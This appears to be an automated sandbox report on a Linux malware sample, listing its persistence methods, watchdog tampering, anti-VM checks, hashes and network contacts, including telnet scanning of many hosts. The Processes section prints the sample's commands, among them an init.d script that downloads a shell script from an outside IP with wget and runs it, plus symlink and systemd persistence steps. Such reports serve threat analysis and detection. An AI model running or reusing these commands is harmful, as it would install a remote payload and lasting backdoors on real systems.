Malware Analysis Report

2025-05-28 20:29

Sample ID 241125-k9ghrazjet
Target 20073737305.zip
SHA256 4bafa66638b4631077e617f850abdec293c5cde65cd12d247bca0c5b029e8357
Tags
antivm defense_evasion discovery persistence privilege_escalation
Score 7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score 7/10

SHA256 4bafa66638b4631077e617f850abdec293c5cde65cd12d247bca0c5b029e8357

Threat Level: Shows suspicious behavior

The file 20073737305.zip was found to show suspicious behavior.

Malicious Activity Summary

antivm defense_evasion discovery persistence privilege_escalation

File and Directory Permissions Modification

Modifies Watchdog functionality

Checks mountinfo of local process

Creates/modifies environment variables

Modifies rc script

Modifies init.d

Modifies systemd

Modifies Bash startup script

Changes its process name

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-25 09:17

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-25 09:17

Reported

2024-11-25 09:20

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

148s

Max time network

131s

Command Line

[/tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/sh N/A
N/A N/A /bin/sh N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /bin/sh N/A
N/A N/A /usr/bin/chmod N/A

Modifies Watchdog functionality

defense_evasion
Description Indicator Process Target
File opened for modification /dev/watchdog /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A
File opened for modification /dev/misc/watchdog /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A

Checks mountinfo of local process

antivm
Description Indicator Process Target
File opened for reading /proc/1669/mountinfo /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A

Creates/modifies environment variables

persistence privilege_escalation defense_evasion
Description Indicator Process Target
File opened for modification /etc/profile /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A

Modifies init.d

persistence
Description Indicator Process Target
File opened for modification /etc/init.d/system /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A
File opened for modification /etc/init.d/sh /bin/sh N/A

Modifies rc script

persistence
Description Indicator Process Target
File opened for modification /etc/rc.local /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A

Modifies systemd

persistence privilege_escalation
Description Indicator Process Target
File opened for modification /etc/systemd/system/custom.service /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A

Modifies Bash startup script

persistence
Description Indicator Process Target
File opened for modification /etc/profile /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself N/A /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/status /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A
File opened for reading /proc/1/cgroup /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A
File opened for reading /proc/filesystems /usr/bin/systemctl N/A
File opened for reading /proc/filesystems /usr/bin/mkdir N/A
File opened for reading /proc/1674/status /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A

Processes

/tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90

[/tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90]

/bin/sh

[sh -c systemctl enable custom.service >/dev/null 2>&1]

/usr/bin/systemctl

[systemctl enable custom.service]

/bin/sh

[sh -c chmod +x /etc/init.d/system >/dev/null 2>&1]

/usr/bin/chmod

[chmod +x /etc/init.d/system]

/bin/sh

[sh -c ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1]

/usr/bin/ln

[ln -s /etc/init.d/system /etc/rcS.d/S99system]

/bin/sh

[sh -c echo "#!/bin/sh # /etc/init.d/sh case \"$1\" in start) echo 'Starting sh' /bin/sh & wget http://193.143.1.70/ -O /tmp/lol.sh chmod +x /tmp/lol.sh /tmp/lol.sh & ;; stop) echo 'Stopping sh' killall sh ;; restart) $0 stop $0 start ;; *) echo \"Usage: $0 {start|stop|restart}\" exit 1 ;; esac exit 0" > /etc/init.d/sh]

/bin/sh

[sh -c chmod +x /etc/init.d/sh >/dev/null 2>&1]

/usr/bin/chmod

[chmod +x /etc/init.d/sh]

/bin/sh

[sh -c mkdir -p /etc/rc.d >/dev/null 2>&1]

/usr/bin/mkdir

[mkdir -p /etc/rc.d]

/bin/sh

[sh -c ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1]

/usr/bin/ln

[ln -s /etc/init.d/sh /etc/rc.d/S99sh]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 154.216.19.139:199 tcp
US 154.216.19.139:199 tcp
US 154.216.19.139:199 tcp
US 154.216.19.139:199 tcp
US 154.216.19.139:199 tcp
US 154.216.19.139:199 tcp
RU 193.143.1.70:38242 tcp
FR 185.189.172.62:23 tcp
US 33.246.150.241:23 tcp
KR 14.60.11.211:23 tcp
BR 191.62.222.55:23 tcp
JP 222.8.115.247:23 tcp
TR 88.249.88.188:23 tcp
US 138.9.138.156:23 tcp
BR 191.38.30.89:23 tcp
CN 106.42.130.194:23 tcp
US 215.46.155.156:23 tcp
TW 60.249.124.58:23 tcp
RO 89.122.114.144:23 tcp
GH 45.211.215.90:23 tcp
US 38.112.237.232:23 tcp
US 29.184.170.230:23 tcp
KR 110.93.130.26:23 tcp
MU 196.53.198.29:23 tcp
US 173.48.110.246:23 tcp
US 26.255.215.101:23 tcp
US 152.190.197.88:23 tcp
US 6.2.129.20:23 tcp
CA 199.43.249.229:23 tcp
KR 183.109.180.25:23 tcp
BY 178.125.95.234:23 tcp
BR 177.64.115.140:23 tcp
RU 188.243.24.194:23 tcp
US 216.147.80.167:23 tcp
CA 138.73.44.190:23 tcp
US 114.57.100.230:23 tcp
US 162.79.222.154:23 tcp
US 56.150.149.54:23 tcp
US 9.21.164.86:23 tcp
FR 109.211.36.197:23 tcp
FR 89.185.163.38:23 tcp
JP 157.73.144.184:23 tcp
DE 84.169.19.201:23 tcp
US 170.215.228.120:23 tcp
SE 193.15.253.49:23 tcp
US 63.242.27.64:23 tcp
US 50.138.148.107:23 tcp

Files

/etc/systemd/system/custom.service

MD5 19a440fdac7f578f2fb33719698a082c
SHA1 ebadce21c65d05ad62a324deb39c57aecd3edf2c
SHA256 b176d41b748466f8ba35246c78a1c940f65403b363c086ccd5b5de577a87cf69
SHA512 8bdfac90e7235fc35eeec141a1e2145ed4ea5a250b71bdf0cf0e5e5aa59ab6dc004dc08561bd5547c4a4a106138c98950dc2098c905ce785b9b2c0657684d7bb

/etc/inittab

MD5 3d6b6e1b05ad5d0538ccd8804bcd279b
SHA1 0fc061b51c225d5bea072c939de05e8a856558bc
SHA256 cab2df9c1c498df29445837610f14ae08d4af98d3acac69b0581c01fe594e3c5
SHA512 1957857cffbc0d526eb04e40db166d661b9dc59fc31fb5551f31cd58d270f839ffa2098e81c8555b12e9dbd55ba17df662b14c6441a6389eb9a76082fa401c98

/boot/bootcmd

MD5 735cae7d3cbab0f59d95f84790282103
SHA1 1cb77931b3097f18988016c9ceba3280a5ccb2ae
SHA256 dfdd4cf729384e4ed52516ab72bd86be286c80f53d4f5b764fd2dd2a2b2c983b
SHA512 998daa467c4ee63dd41515897728de70cbb9c579ca8b16c26d8e6db5edad53c6dbd6343fb10eda3dbc29b0cb1fa72a9b2653250e9027e6ee02d17726e958bbfe

/etc/init.d/system

MD5 f000251d92c773cc3ee1ca22cf5f0788
SHA1 e2386fe6a5f29b1e9e5ad5b38928c024f97105e6
SHA256 31a77745dd3724a0691a9255738b9c87516868932e3eb992e2afafcd0574a985
SHA512 0dad5adaa7742dd208596fefad53ab21c39fbf2cbe5c9958b92170d555d316f0a0b02ec5236311b869aa18e90592e81439a3a229bf1307b5daf87d87c5f493c2

/etc/init.d/sh

MD5 c5583b6a699f62cb0a004c99842f5c70
SHA1 b232ef89bf9b36643b5956aaacfd295b9ce2a0a7
SHA256 2b03c83558e4af71f3b35408cf668a2ee06931c21adec760952a21a11bc4c59b
SHA512 a9fc1e4c30452a3d100a8ccfbb707d9d323830fbbca90c98d3c126bf943539baaf1fccb04d435a4b627ed7f1bfb1bbd649dab282488d951dde87e097423e154d

/etc/motd

MD5 2bd9b4be30579e633fc0191aa93df486
SHA1 7d63a9bd9662e86666b27c1b50db8e7370c624ff
SHA256 64dc39f3004dc93c9fc4f1467b4807f2d8e3eb0bfa96b15c19cd8e7d6fa77a1d
SHA512 ae6dd7b39191354cf43cf65e517460d7d4c61b8f5c08e33e6ca3c451dc7cab4de89f33934c89396b80f1aade0a4e2571bd5ae8b76ef80b737d4588703d2814d5